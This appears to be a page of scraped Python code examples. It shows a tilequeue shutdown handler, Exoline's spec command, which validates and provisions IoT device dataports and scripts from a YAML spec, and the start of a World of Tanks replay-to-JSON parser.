        logger.info('joining multiprocess data fetch queue ... done')

        logger.info('joining multiprocess process queue ...')
        processor_queue.close()
        processor_queue.join_thread()
        logger.info('joining multiprocess process queue ... done')

        logger.warn('tilequeue processing shutdown ... done')
        sys.exit(0)

    signal.signal(signal.SIGTERM, stop_all_workers)
    signal.signal(signal.SIGINT, stop_all_workers)
    signal.signal(signal.SIGQUIT, stop_all_workers)

    logger.warn('all tilequeue threads and processes started')

    # this is necessary for the main thread to receive signals
    # when joining on threads/processes, the signal is never received
    # http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
    while True:
        time.sleep(1024)

Example 103

Project: exoline
Source File: spec.py
View license
    def run(self, cmd, args, options):
        if args['--example']:
            s = '''
# Example client specification file
# Specification files are in YAML format (a superset of JSON
# with more readable syntax and support for comments) and
# look like this. They may contain comments that begin
# with a # sign.

# Device client model information
device:
    model: "myModel"
    vendor: "myVendor"

# list of dataports that must exist
dataports:
      # this the absolute minimum needed to specify a
      # dataport.
    - alias: mystring
      # names are created, but not compared
    - name: Temperature
      # aliases, type, and format are created
      # and compared
      alias: temp
      format: float
      unit: °F
    - name: LED Control
      alias: led6
      format: integer
    - alias: config
      # format should be string, and parseable JSON
      format: string/json
      # initial value (if no other value is read back)
      initial: '{"text": "555-555-1234", "email": "[email protected]"}'
    - alias: person
      format: string/json
      # JSON schema specified inline (http://json-schema.org/)
      # format must be string/json to do validate
      # you may also specify a string to reference schema in an
      # external file. E.g. jsonschema: personschema.json
      jsonschema: {"title": "Person Schema",
                   "type": "object",
                   "properties": {"name": {"type": "string"}},
                   "required": ["name"]}
      initial: '{"name":"John Doe"}'
    - alias: place
      # An description of the dataport.
      description: 'This is a place I have been'
      # Dataports are not public by default,
      # but if you want to share one with the world
      public: true

    # any dataports not listed but found in the client
    # are ignored. The spec command does not delete things.

# list of script datarules that must exist
scripts:
    # by default, scripts are datarules with
    # names and aliases set to the file name
    - file: test/files/helloworld.lua
    # you can also set them explicitly
    - file: test/files/helloworld.lua
      alias: greeting
    # you can also place lua code inline
    - alias: singleLineScript
      code: debug('hello from inside lua!')
    # multiline lua scripts should start with | and
    # be indented inside the "code:" key.
    - alias: multilineScript
      code: |
        for x=1,10 do
            debug('hello from for loop ' .. x)
        end
    # simple templating for script aliases and
    # content is also supported.
    - file: test/files/convert.lua
      # if <% id %> is embedded in aliases
      # or script content, the --ids parameter must
      # be passed in. The spec command then expects
      # a script or dataport resource per id passed, substituting
      # each ID for <% id %>. In this example, if the command was:
      #
      # $ exo spec mysensor sensorspec.yaml --ids=A,B
      #
      # ...then the spec command looks for *two* script datarules
      # in mysensor, with aliases convertA.lua and convertB.lua.
      # Additionally, any instances of <% id %> in the content of
      # convert.lua are substituted with A and B before being
      # written to each script datarule.
      #
      alias: convert<% id %>.lua

# list of dispatches that must exist
dispatches:
    - alias: myDispatch
      # email | http_get | http_post | http_put | sms | xmpp
      method: email
      recipient: [email protected]
      message: hello from Exoline spec example!
      subject: hello!
      # may be an RID or alias
      subscribe: mystring

# list of simple datarules that must exist.
# scripts may go here too, but it's better to
# to put them under scripts (above)
datarules:
    - alias: highTemp
      format: float
      subscribe: temp
      rule: {
        "simple": {
          "comparison": "gt",
          "constant": 80,
          "repeat": true
        }
      }
'''
            if not six.PY3:
                s = s.encode('utf-8')
            print(s)
            return

        ExoException = options['exception']
        def load_file(path, base_url=None):
            '''load a file based on a path that may be a filesystem path
            or a URL. Consider it a URL if it starts with two or more
            alphabetic characters followed by a colon'''
            def load_from_url(url):
                # URL. use requests
                r = requests.get(url)
                if r.status_code >= 300:
                    raise ExoException('Failed to read file at URL ' + url)
                return r.text, '/'.join(r.url.split('/')[:-1])

            if re.match('[a-z]{2}[a-z]*:', path):
                return load_from_url(path)
            elif base_url is not None:
                # non-url paths when spec is loaded from URLs
                # are considered relative to that URL
                return load_from_url(base_url + '/' + path)
            else:
                with open(path, 'rb') as f:
                    return f.read(), None


        def load_spec(args):
            # returns loaded spec and path for script files
            try:
                content, base_url = load_file(args['<spec-yaml>'])
                spec = yaml.safe_load(content)
                return spec, base_url
            except yaml.scanner.ScannerError as ex:
                raise ExoException('Error parsing YAML in {0}\n{1}'.format(args['<spec-yaml>'],ex))

        def check_spec(spec, args):
            msgs = []
            for typ in TYPES:
                if typ in spec and plural(typ) not in spec:
                    msgs.append('found "{0}"... did you mean "{1}"?'.format(typ, typ + 's'))
            for dp in spec.get('dataports', []):
                if 'alias' not in dp:
                    msgs.append('dataport is missing alias: {0}'.format(dp))
                    continue
                alias = dp['alias']
                if 'jsonschema' in dp:
                    schema = dp['jsonschema']
                    if isinstance(schema, six.string_types):
                        schema = json.loads(open(schema).read())
                    try:
                        jsonschema.Draft4Validator.check_schema(schema)
                    except Exception as ex:
                        msgs.append('{0} failed jsonschema validation.\n{1}'.format(alias, str(ex)))
            if len(msgs) > 0:
                raise ExoException('Found some problems in spec:\n' + '\n'.join(msgs))

        if args['--check']:
            # Validate all the jsonschema
            spec, base_url = load_spec(args)
            check_spec(spec, args)
            return

        reid = re.compile('<% *id *%>')
        def infoval(input_auth, alias):
            '''Get info and latest value for a resource'''
            return rpc._exomult(
                input_auth,
                [['info', {'alias': alias}, {'description': True, 'basic': True}],
                ['read', {'alias': alias}, {'limit': 1}]])

        def check_or_create_description(auth, info, args):
            if 'device' in spec and 'limits' in spec['device']:
                speclimits = spec['device']['limits']
                infolimits = info['description']['limits']
                limits_mismatched = False
                for limit in speclimits:
                    if limit not in infolimits:
                        raise ExoException('spec file includes invalid limit {0}'.format(limit))
                    if speclimits[limit] != infolimits[limit]:
                        limits_mismatched = True
                if limits_mismatched:
                    if create:
                        if 'client_id' not in auth:
                            raise ExoException('limits update for client requires --portal or --domain')

                        rpc.update(auth['cik'], auth['client_id'], {'limits': speclimits})
                        sys.stdout.write('updated limits for client' +
                                         ' RID {0}'.format(auth['client_id']))
                    else:
                        sys.stdout.write(
                            'limits for client {0} do not match spec:\nspec: {1}\nclient: {2}'.format(
                                auth,
                                json.dumps(speclimits, sort_keys=True),
                                json.dumps(infolimits, sort_keys=True)))


        def check_or_create_common(auth, res, info, alias, aliases):
            if info['basic']['type'] != typ:
                raise ExoException('{0} is a {1} but should be a {2}.'.format(alias, info['basic']['type'], typ))

            new_desc = info['description'].copy()
            need_update = False

            if 'public' in res:
                res_pub = res['public']
                desc = info['description']
                if desc['public'] != res_pub:
                    if create:
                        new_desc['public'] = res_pub
                        need_update = True
                    else:
                        sys.stdout.write('spec expects public for {0} to be {1}, but it is not.\n'.format(alias, res_pub))
                        print(json.dumps(res))

            if 'subscribe' in res:
                # Alias *must* be local to this client
                resSub = res['subscribe']
                # Lookup alias/name if need be
                if resSub in aliases:
                    resSub = aliases[resSub]
                desc = info['description']
                if desc['subscribe'] != resSub:
                    if create:
                        new_desc['subscribe'] = resSub
                        need_update = True
                    else:
                        sys.stdout.write('spec expects subscribe for {0} to be {1}, but they are not.\n'.format(alias, resSub))

            if 'preprocess' in res:
                def fromAliases(pair):
                    if pair[1] in aliases:
                        return [pair[0], aliases[pair[1]]]
                    else:
                        return pair
                resPrep = [fromAliases(x) for x in res['preprocess']]
                preprocess = info['description']['preprocess']
                if create:
                    new_desc['preprocess'] = resPrep
                    need_update = True
                else:
                    if preprocess is None or len(preprocess) == 0:
                        sys.stdout.write('spec expects preprocess for {0} to be {1}, but they are missing.\n'.format(alias, resPrep))
                    elif preprocess != resPrep:
                        sys.stdout.write('spec expects preprocess for {0} to be {1}, but they are {2}.\n'.format(alias, resPrep, preprocess))

            if 'retention' in res:
                resRet = {}
                if 'count' in res['retention']:
                    resRet['count'] = res['retention']['count']
                if 'duration' in res['retention']:
                    resRet['duration'] = res['retention']['duration']
                retention = info['description']['retention']
                if create:
                    new_desc['retention'] = resRet
                    need_update = True
                elif retention != resRet:
                    sys.stdout.write('spec expects retention for {0} to be {1}, but they are {2}.\n'.format(alias, resRet, retention))

            if need_update:
                rpc.update(auth, {'alias': alias}, new_desc)

        def get_format(res, default='string'):
            format = res['format'] if 'format' in res else default
            pieces = format.split('/')
            if len(pieces) > 1:
                format = pieces[0]
                format_content = pieces[1]
            else:
                format_content = None
            return format, format_content

        def add_desc(key, res, desc, required=False):
            '''add key from spec resource to a 1P resource description'''
            if key in res:
                desc[key] = res[key]
            else:
                if required:
                    raise ExoException('{0} in spec is missing required property {1}.'.format(alias, key))

        def create_resource(auth, typ, desc, alias, msg=''):
            name = res['name'] if 'name' in res else alias
            print('Creating {0} with name: {1}, alias: {2}{3}'.format(
                typ, name, alias, msg))
            rid = rpc.create(auth, typ, desc, name=name)
            rpc.map(auth, rid, alias)
            info, val = infoval(auth, alias)
            aliases[alias] = rid
            return info, val

        def check_or_create_datarule(auth, res, info, val, alias, aliases):
            format, format_content = get_format(res, 'float')
            if not exists and create:
                desc = {'format': format}
                desc['retention'] = {'count': 'infinity', 'duration': 'infinity'}
                add_desc('rule', res, desc, required=True)
                info, val = create_resource(
                    auth,
                    'datarule',
                    desc,
                    alias,
                    msg=', format: {0}, rule: {1}'.format(desc['format'], desc['rule']))

            # check format
            if format != info['description']['format']:
                raise ExoException(
                    '{0} is a {1} but should be a {2}.'.format(
                    alias, info['description']['format'], format))

            # check rule
            infoRule = json.dumps(info['description']['rule'], sort_keys=True)
            specRule = json.dumps(res['rule'], sort_keys=True)
            if infoRule != specRule:
                if create:
                    info['description']['rule'] = res['rule']
                    rpc.update(auth, {'alias': alias}, info['description'])
                    sys.stdout.write('updated rule for {0}\n'.format(alias))
                else:
                    sys.stdout.write(
                        'spec expects rule for {0} to be:\n{1}\n...but it is:\n{2}\n'.format(
                        alias, specRule, infoRule))

            check_or_create_common(auth, res, info, alias, aliases)

        def check_or_create_dataport(auth, res, info, val, alias, aliases):
            format, format_content = get_format(res, 'string')
            if not exists and create:
                desc = {'format': format}
                desc['retention'] = {'count': 'infinity', 'duration': 'infinity'}
                info, val = create_resource(
                    auth,
                    'dataport',
                    desc,
                    alias,
                    msg=', format: {0}'.format(format))

            # check format
            if format != info['description']['format']:
                raise ExoException(
                    '{0} is a {1} but should be a {2}.'.format(
                    alias, info['description']['format'], format))

            # check initial value
            if 'initial' in res and len(val) == 0:
                if create:
                    initialValue = template(res['initial'])
                    print('Writing initial value {0}'.format(initialValue))
                    rpc.write(auth, {'alias': alias}, initialValue)
                    # update values being validated
                    info, val = infoval(auth, alias)
                else:
                    print('Required initial value not found in {0}. Pass --create to write initial value.'.format(alias))

            # check format content (e.g. json)
            if format_content == 'json':
                if format != 'string':
                    raise ExoException(
                        'Invalid spec for {0}. json content type only applies to string, not {1}.'.format(alias, format));
                if len(val) == 0:
                    print('Spec requires {0} be in JSON format, but it is empty.'.format(alias))
                else:
                    obj = None
                    try:
                        obj = json.loads(val[0][1])
                    except:
                        print('Spec requires {0} be in JSON format, but it does not parse as JSON. Value: {1}'.format(
                            alias,
                            val[0][1]))

                    if obj is not None and 'jsonschema' in res:
                        schema = res['jsonschema']
                        if isinstance(schema, six.string_types):
                            schema = json.loads(open(schema).read())
                        try:
                            jsonschema.validate(obj, schema)
                        except Exception as ex:
                            print("{0} failed jsonschema validation.".format(alias))
                            print(ex)

            elif format_content is not None:
                raise ExoException(
                    'Invalid spec for {0}. Unrecognized format content {1}'.format(alias, format_content))

            # check unit
            if 'unit' in res or 'description' in res:
                meta_string = info['description']['meta']
                try:
                    meta = json.loads(meta_string)
                except:
                    meta = None

                def bad_desc_msg(s):
                    desc='""'
                    if 'description' in res:
                        desc = res['description']
                    sys.stdout.write('spec expects description for {0} to be {1}{2}\n'.format(alias, desc, s))
                def bad_unit_msg(s):
                    unit=''
                    if 'unit' in res:
                        unit = res['unit']
                    sys.stdout.write('spec expects unit for {0} to be {1}{2}\n'.format(alias, unit, s))

                if create:
                    if meta is None:
                        meta = {'datasource':{'description':'','unit':''}}
                    if 'datasource' not in meta:
                        meta['datasource'] = {'description':'','unit':''}
                    if 'unit' in res:
                        meta['datasource']['unit'] = res['unit']
                    if 'description:' in res:
                        meta['datasource']['description'] = res['description']

                    info['description']['meta'] = json.dumps(meta)
                    rpc.update(auth, {'alias': alias}, info['description'])

                else:
                    if meta is None:
                        sys.stdout.write('spec expects metadata but found has no metadata at all. Pass --create to write metadata.\n')
                    elif 'datasource' not in meta:
                        sys.stdout.write('spec expects datasource in metadata but found its not there. Pass --create to write metadata.\n')
                    elif 'unit' not in meta['datasource'] and 'unit' in res:
                        bad_unit_msg(', but no unit is specified in metadata. Pass --create to set unit.\n')
                    elif 'description' not in meta['datasource'] and 'description' in res:
                        bad_desc_msg(', but no description is specified in metadata. Pass --create to set description.\n')
                    elif 'unit' in res and meta['datasource']['unit'] != res['unit']:
                        bad_unit_msg(', but metadata specifies unit of {0}. Pass --create to update unit.\n'.format(meta['datasource']['unit']))
                    elif 'description' in res and meta['datasource']['description'] != res['description']:
                        bad_desc_msg(', but metadata specifies description of {0}. Pass --create to update description.\n'.format(meta['datasource']['description']))

            check_or_create_common(auth, res, info, alias, aliases)

        def check_or_create_dispatch(auth, res, info, alias, aliases):
            if not exists and create:
                desc = {}
                add_desc('method', res, desc, required=True)
                add_desc('recipient', res, desc, required=True)
                add_desc('subject', res, desc)
                add_desc('message', res, desc)
                desc['retention'] = {'count': 'infinity', 'duration': 'infinity'}
                info, val = create_resource(
                    auth,
                    'dispatch',
                    desc,
                    alias,
                    msg=', method: {0}, recipient: {1}'.format(desc['method'], desc['recipient']))

            # check dispatch-specific things
            def check_desc(key, res, desc):
                '''check a specific key and return whether an update is required'''
                if key in res and desc[key] != res[key]:
                    if create:
                        desc[key] = res[key]
                        return True
                    else:
                        sys.stdout.write(
                            'spec expects {0} for {1} to be {2} but it is {3}\n'.format(
                            key, alias, res[key], desc[key]))
                return False

            desc = info['description']
            need_update = False
            need_update = check_desc('method', res, desc) or need_update
            need_update = check_desc('recipient', res, desc) or need_update
            need_update = check_desc('subject', res, desc) or need_update
            need_update = check_desc('message', res, desc) or need_update
            if need_update:
                rpc.update(auth, {'alias': alias}, desc)
                sys.stdout.write('updated {0} to {1}\n'.format(alias, json.dumps(desc, sort_keys=True)))

            check_or_create_common(auth, res, info, alias, aliases)


        input_auth = options['auth']
        exoutils = options['utils']
        rpc = options['rpc']
        asrid = args['--asrid']

        if cmd == 'spec':

            if args['--generate'] is not None:
                spec_file = args['--generate']
                if args['--scripts'] is not None:
                    script_dir = args['--scripts']
                else:
                    script_dir = 'scripts'
                print('Generating spec for {0}.'.format(input_auth))
                print('spec file: {0}, scripts directory: {1}'.format(spec_file, script_dir))

                # generate spec file, download scripts
                spec = {}
                info, listing = rpc._exomult(input_auth,
                    [['info', {'alias': ''}, {'basic': True,
                                              'description': True,
                                              'aliases': True}],
                     ['listing', ['dataport', 'datarule', 'dispatch'], {}, {'alias': ''}]])
                rids = listing['dataport'] + listing['datarule'] + listing['dispatch']

                if len(rids) > 0:
                    child_info = rpc._exomult(input_auth, [['info', rid, {'basic': True, 'description': True}] for rid in rids])
                    for idx, rid in enumerate(rids):
                        myinfo = child_info[idx]
                        name = myinfo['description']['name']
                        def skip_msg(msg):
                            print('Skipping {0} (name: {1}). {2}'.format(rid, name, msg))
                        if rid not in info['aliases']:
                            skip_msg('It needs an alias.')
                            continue

                        # adds properties common to dataports and dispatches:
                        # preprocess, subscribe, retention, meta, public
                        def add_common_things(res):
                            res['name'] = myinfo['description']['name']
                            res['alias'] = info['aliases'][rid][0]
                            preprocess = myinfo['description']['preprocess']
                            if preprocess is not None and len(preprocess) > 0:
                                def toAlias(pair):
                                    if not asrid and pair[1] in info['aliases']:
                                        return [pair[0], info['aliases'][pair[1]][0]]
                                    else:
                                        return pair
                                res['preprocess'] = [toAlias(x) for x in preprocess]


                            subscribe = myinfo['description']['subscribe']
                            if subscribe is not None and subscribe is not "":
                                if not asrid and subscribe in info['aliases']:
                                    res['subscribe'] = info['aliases'][subscribe][0]
                                else:
                                    res['subscribe'] = subscribe

                            retention = myinfo['description']['retention']
                            if retention is not None:
                                count = retention['count']
                                duration = retention['duration']
                                if count is not None and duration is not None:
                                    if count == 'infinity':
                                        del retention['count']
                                    if duration == 'infinity':
                                        del retention['duration']
                                    if len(retention) > 0:
                                        res['retention'] = retention

                            meta_string = myinfo['description']['meta']
                            try:
                                meta = json.loads(meta_string)
                                unit = meta['datasource']['unit']
                                if len(unit) > 0:
                                    res['unit'] = unit
                                desc = meta['datasource']['description']
                                if len(desc) > 0:
                                    res['description'] = desc
                            except:
                                # assume unit is not present in metadata
                                pass

                            public = myinfo['description']['public']
                            if public is not None and public:
                                res['public'] = public


                        typ = myinfo['basic']['type']
                        if typ == 'dataport':
                            res = {
                                'format': myinfo['description']['format']
                            }
                            add_common_things(res)
                            spec.setdefault('dataports', []).append(res)

                        elif typ == 'datarule':
                            desc = myinfo['description']
                            is_script = desc['format'] == 'string' and 'rule' in desc and 'script' in desc['rule']
                            if is_script:
                                if not os.path.exists(script_dir):
                                    os.makedirs(script_dir)
                                filename = os.path.join(script_dir, info['aliases'][rid][0])
                                spec.setdefault('scripts', []).append({'file': filename})
                                with open(filename, 'w') as f:
                                    print('Writing {0}...'.format(filename))
                                    f.write(desc['rule']['script'].encode('utf8'))
                            else:
                                res = {
                                    'rule': desc['rule']
                                }
                                add_common_things(res)
                                spec.setdefault('datarules', []).append(res)

                        elif typ == 'dispatch':
                            desc = myinfo['description']
                            res = {
                                'method': desc['method'],
                                'message': desc['message'],
                                'recipient': desc['recipient'],
                                'subject': desc['subject']
                            }
                            add_common_things(res)
                            spec.setdefault('dispatches', []).append(res)

                with open(spec_file, 'w') as f:
                    print('Writing {0}...'.format(spec_file))
                    yaml.safe_dump(spec, f, encoding='utf-8', indent=4, default_flow_style=False, allow_unicode=True)
                return

            updatescripts = args['--update-scripts']
            create = args['--create']

            def query_yes_no(question, default="yes"):
                """Ask a yes/no question via raw_input() and return their answer.

                "question" is a string that is presented to the user.
                "default" is the presumed answer if the user just hits <Enter>.
                    It must be "yes" (the default), "no" or None (meaning
                    an answer is required of the user).

                The "answer" return value is one of "yes" or "no".
                """
                valid = {"yes":True,   "y":True,  "ye":True,
                         "no":False,     "n":False}
                if default == None:
                    prompt = " [y/n] "
                elif default == "yes":
                    prompt = " [Y/n] "
                elif default == "no":
                    prompt = " [y/N] "
                else:
                    raise ValueError("invalid default answer: '%s'" % default)

                while True:
                    sys.stdout.write(question + prompt)
                    choice = raw_input().lower()
                    if default is not None and choice == '':
                        return valid[default]
                    elif choice in valid:
                        return valid[choice]
                    else:
                        sys.stdout.write("Please respond with 'yes' or 'no' "\
                                         "(or 'y' or 'n').\n")

            def generate_aliases_and_data(res, args):
                ids = args['--ids']
                if 'alias' in res:
                    alias = res['alias']
                else:
                    if 'file' in res:
                        alias = os.path.basename(res['file'])
                    else:
                        raise ExoException('Resources in spec must have an alias. (For scripts, "file" will substitute.)')

                if reid.search(alias) is None:
                    yield alias, None
                else:
                    alias_template = alias
                    if ids is None:
                        raise ExoException('This spec requires --ids')
                    ids = ids.split(',')
                    for id, alias in [(id, reid.sub(id, alias_template)) for id in ids]:
                        yield alias, {'id': id}

            spec, base_url = load_spec(args)
            check_spec(spec, args)

            device_auths = []
            portal_ciks = []

            iterate_portals = False

            def auth_string(auth):
                if isinstance(auth, dict):
                    return json.dumps(auth)
                else:
                    return auth

            if args['--portal'] == True:
                cik = exoutils.get_cik(input_auth, allow_only_cik=True)
                portal_ciks.append((cik,''))
                iterate_portals = True

            if args['--domain'] == True:
                cik = exoutils.get_cik(input_auth, allow_only_cik=True)
                #set iterate_portals flag to true so we can interate over each portal
                iterate_portals = True
                # Get list of users under a domain
                user_keys = []
                clients = rpc._listing_with_info(cik,['client'])

                email_regex = re.compile(r'[^@][email protected][^@]+\.[^@]+')

                for k,v in clients['client'].items():
                    name = v['description']['name']
                    # if name is an email address
                    if email_regex.match(name):
                        user_keys.append(v['key'])


                # Get list of each portal
                for key in user_keys:
                    userlisting = rpc._listing_with_info(key,['client'])
                    for k,v in userlisting['client'].items():
                        portal_ciks.append((v['key'],v['description']['name']))
                    #print(x)


            if iterate_portals == True:
                for portal_cik, portal_name in portal_ciks:
                    # If user passed in the portal flag, but the spec doesn't have
                    # a vendor/model, exit
                    if (not 'device' in spec) or (not 'model' in spec['device']) or (not 'vendor' in spec['device']):
                        print("With --portal (or --domain) option, spec file requires a\r\n"
                              "device model and vendor field:\r\n"
                              "e.g.\r\n"
                              "device:\r\n"
                              "    model: modelName\r\n"
                              "    vendor: vendorName\r\n")
                        raise ExoException('--portal flag requires a device model/vendor in spec file')
                    else:

                        # get device vendor and model
                        modelName = spec['device']['model']
                        vendorName = spec['device']['vendor']

                        # If the portal has no name, use the cik as the name
                        if portal_name == '':
                            portal_name = portal_cik
                        print('Looking in ' + portal_name + ' for ' + modelName + '/' + vendorName)
                        # Get all clients in the portal
                        clients = rpc._listing_with_info(portal_cik, ['client'])
                        #print(modelName)
                        # for each client
                        for rid, v in iteritems(list(iteritems(clients))[0][1]):
                            # Get meta field
                            validJson = False
                            meta = None
                            try:
                                meta = json.loads(v['description']['meta'])
                                validJson = True
                            except ValueError as e:
                                # no json in this meat field
                                validJson = False
                            if validJson == True:
                                # get device type (only vendor types have a model and vendor
                                typ = meta['device']['type']

                                # if the device type is 'vendor'
                                if typ == 'vendor':
                                    # and it matches our vendor/model in the spec file
                                    if meta['device']['vendor'] == vendorName:
                                        if meta['device']['model'] == modelName:
                                            # Append an auth for this device to our list
                                            auth = {
                                                'cik': portal_cik, # v['key'],
                                                'client_id': rid
                                            }
                                            device_auths.append(auth)
                                            print('  found: {0} {1}'.format(v['description']['name'], auth_string(auth)))
            else:
                # only for single client
                device_auths.append(input_auth)

            # Make sure user knows they are about to update multiple devices
            # unless the `-f` flag is passed
            if ((args['--portal'] or args['--domain']) and args['--create']) and not args['-f']:
                res = query_yes_no("You are about to update " + str(len(device_auths)) + " devices, are you sure?")
                if res == False:
                    print('exiting')
                    return

            # for each device in our list of device_auths
            for auth in device_auths:
                try:
                    aliases = {}
                    print("Running spec on: {0}".format(auth_string(auth)))
                    #   apply spec [--create]

                    # Get map of aliases and description
                    info = rpc.info(auth, {'alias': ''}, {'aliases': True, 'description': True})
                    try:
                        for rid, alist in info['aliases'].items():
                            for alias in alist:
                                aliases[alias] = rid
                    except:
                        pass

                    # Check limits
                    check_or_create_description(auth, info, args)

                    for typ in TYPES:
                        for res in spec.get(plural(typ), []):
                            for alias, resource_data in generate_aliases_and_data(res, args):
                                # TODO: handle nonexistence
                                exists = True
                                try:
                                    info, val = infoval(auth, alias)
                                except rpc.RPCException as e:
                                    info = None
                                    val = None
                                    exists = False
                                    print('{0} not found.'.format(alias))
                                    if not create:
                                        print('Pass --create to create it')
                                        continue
                                except pyonep.exceptions.OnePlatformException as ex:
                                    exc = ast.literal_eval(ex.message)

                                    if exc['code'] == 401:
                                        raise Spec401Exception()
                                    else:
                                        raise ex

                                def template(script):
                                    if resource_data is None:
                                        return script
                                    else:
                                        return reid.sub(resource_data['id'], script)

                                if typ == 'client':
                                    if not exists:
                                        if create:
                                            print('Client creation is not yet supported')
                                        continue
                                elif typ == 'dataport':
                                    check_or_create_dataport(auth, res, info, val, alias, aliases)
                                elif typ == 'dispatch':
                                    check_or_create_dispatch(auth, res, info, alias, aliases)
                                elif typ == 'datarule':
                                    check_or_create_datarule(auth, res, info, val, alias, aliases)
                                elif typ == 'script':
                                    if 'file' not in res and 'code' not in res:
                                        raise ExoException('{0} is a script, so it needs a "file" or "code" key'.format(alias))
                                    if 'file' in res and 'code' in res:
                                        raise ExoException('{0} specifies both "file" and "code" keys, but they\'re mutually exclusive.')

                                    name = res['name'] if 'name' in res else alias

                                    if 'file' in res:
                                        content, _ = load_file(res['file'], base_url=base_url)
                                        if not six.PY3 or type(content) is bytes:
                                            content = content.decode('utf8')
                                    else:
                                        content = res['code']
                                    if not exists and create:
                                        rpc.upload_script_content([auth], content, name=alias, create=True, filterfn=template)
                                        continue

                                    script_spec = template(content)
                                    script_svr = info['description']['rule']['script']
                                    script_friendly = 'file {0}'.format(res['file']) if 'file' in res else '"code" value in spec'
                                    if script_svr != script_spec:
                                        print('Script for {0} does not match {1}.'.format(alias, script_friendly))
                                        if updatescripts:
                                            print('Uploading script to {0}...'.format(alias))
                                            rpc.upload_script_content([auth], script_spec, name=name, create=False, filterfn=template)
                                        elif not args['--no-diff']:
                                            # show diff
                                            import difflib
                                            differences = '\n'.join(
                                                difflib.unified_diff(
                                                    script_spec.splitlines(),
                                                    script_svr.splitlines(),
                                                    fromfile=script_friendly,
                                                    tofile='info["description"]["rule"]["script"]'))

                                            print(differences)
                                else:
                                    raise ExoException('Found unsupported type {0} in spec.'.format(typ))
                except Spec401Exception as ex:
                    print("******WARNING******* 401 received in spec, is the device expired?")
                    pass

Example 104

Project: WoT-Replay-To-JSON
Source File: wotrp2j.py
View license
def main():

	parserversion = "0.9.8.0"

	global option_console, option_advanced, option_chat, option_server, filename_source
	option_console = 0
	option_advanced = 0
	option_chat = 0
	option_server = 0
	
	filename_source = ""
	
	replay_version = "0.0.0.0"
	replay_version_dict = ['0', '0', '0', '0']
	

	for argument in sys.argv:
			if argument == "-c":
				option_console = 1
				
			if argument == "-a":
				option_advanced = 1

			if argument == "-chat":
				option_chat = 1
				
			if argument == "-s":
				option_server = 1
			

	printmessage('###### WoT-Replay-To-JSON ' + parserversion + " by vBAddict.net")

	if len(sys.argv)==1:
				printmessage('Please specify filename and options')
				sys.exit(2)

	filename_source = str(sys.argv[1])
	
	printmessage('Processing ' + filename_source)
	
	result_blocks = dict()
	result_blocks['common'] = dict()
	result_blocks['common']['parser'] = "WoT-Replay-To-JSON " + parserversion + " by http://www.vbaddict.net"

	result_blocks['identify'] = dict()
	result_blocks['identify']['arenaUniqueID'] = 0
	
	if not os.path.exists(filename_source) or not os.path.isfile(filename_source) or not os.access(filename_source, os.R_OK):
		result_blocks['common']['message'] = 'cannot read file ' + filename_source
		dumpjson(result_blocks, filename_source, 1)

	f = open(filename_source, 'rb')
	
	try:
		f.seek(4)
		numofblocks = struct.unpack("I",f.read(4))[0]
		printmessage("Found Blocks: " + str(numofblocks))
		blockNum = 1
		datablockPointer = {}
		datablockSize = {}
		startPointer = 8
	except Exception, e:
		result_blocks['common']['message'] = e.message
		dumpjson(result_blocks, filename_source, 1)

	if numofblocks == 0:
		result_blocks['common']['message'] = "unknown file structure"
		dumpjson(result_blocks, filename_source, 1)

	if numofblocks > 5:

		result_blocks['common']['message'] = "uncompressed replay"
		result_blocks['datablock_advanced'] = extract_advanced(filename_source)
			
		if result_blocks['datablock_advanced']['valid'] == 1:
			
			result_blocks['identify']['accountDBID'] = 0
			result_blocks['identify']['internaluserID'] = 0
			if result_blocks['datablock_advanced']['playername'] in result_blocks['datablock_advanced']['roster']:
				rosterdata = dict()			
				rosterdata = result_blocks['datablock_advanced']['roster'][result_blocks['datablock_advanced']['playername']]
				result_blocks['identify']['accountDBID'] = rosterdata['accountDBID'] 
				result_blocks['identify']['countryid'] = rosterdata['countryID']
				result_blocks['identify']['internaluserID'] = rosterdata['internaluserID']
				result_blocks['identify']['tankid'] = rosterdata['tankID']
		
			
			result_blocks['identify']['arenaUniqueID'] = result_blocks['datablock_advanced']['arenaUniqueID']
			result_blocks['identify']['arenaCreateTime'] = result_blocks['datablock_advanced']['arenaCreateTime']
			
			mapsdata = get_json_data("maps.json")
			mapname='unknown'
			for mapdata in mapsdata:
				if mapdata['mapid'] == result_blocks['datablock_advanced']['arenaTypeID']:
						mapname = mapdata['mapidname']
						break

			result_blocks['identify']['mapName'] = mapname
			
			
			result_blocks['identify']['mapid'] = result_blocks['datablock_advanced']['arenaTypeID']
			result_blocks['identify']['playername'] = result_blocks['datablock_advanced']['playername']
			result_blocks['identify']['replay_version'] = result_blocks['datablock_advanced']['replay_version']
			
			result_blocks['identify']['error'] = "none"
			result_blocks['identify']['error_details'] = "none"

			result_blocks['common']['datablock_advanced'] = 1

			if option_chat==1:
				result_blocks['chat'] = extract_chats(filename_source)
				result_blocks['common']['datablock_chat'] = 1
		else:
			result_blocks['common']['message'] = "replay incompatible"
			dumpjson(result_blocks, filename_source, 1)
		
		
		dumpjson(result_blocks, filename_source, 0)

	
	

	while numofblocks >= 1:
		try:
			printmessage("Retrieving data for block " + str(blockNum))
			f.seek(startPointer)
			size = f.read(4)
			datablockSize[blockNum] = struct.unpack("I", size)[0]
			datablockPointer[blockNum] = startPointer + 4
			startPointer=datablockPointer[blockNum]+datablockSize[blockNum]
			blockNum += 1
			numofblocks -= 1
		except Exception, e:
			result_blocks['common']['message'] = e.message
			dumpjson(result_blocks, filename_source, 1)
		
	processing_block = 0
	
	for i in datablockSize:
		
		processing_block += 1
		
		try:
			pass
		except Exception, e:
			result_blocks['common']['message'] = e.message
			dumpjson(result_blocks, filename_source, 1)
			
		printmessage("Retrieving block " + str(processing_block))
		f.seek(datablockPointer[i])
							
		myblock = f.read(int(datablockSize[i]))

		if 'arenaUniqueID' in myblock:

			if version_check(replay_version, "0.8.11.0") > -1 or myblock[0]=='[':
				br_json_list = dict()
		
				try:
					br_json_list = json.loads(myblock)
				except Exception, e:
					printmessage("Error with JSON: " + e.message)
				
				if len(br_json_list)==0:
					continue

				br_block = br_json_list[0]
				br_block['parser'] = dict()
				br_block['parser']['battleResultVersion'] = 14

				if version_check(replay_version, "0.9.8.0") > -1:
					br_block['parser'] = dict()
					br_block['parser']['battleResultVersion'] = 15
					if 'personal' in br_block:
						for vehTypeCompDescr, ownResults in br_block['personal'].copy().iteritems():
							if 'details' in ownResults:
								ownResults['details'] = decode_details(ownResults['details'])
								print ownResults['details']
								br_block['personal'][vehTypeCompDescr] = ownResults

					
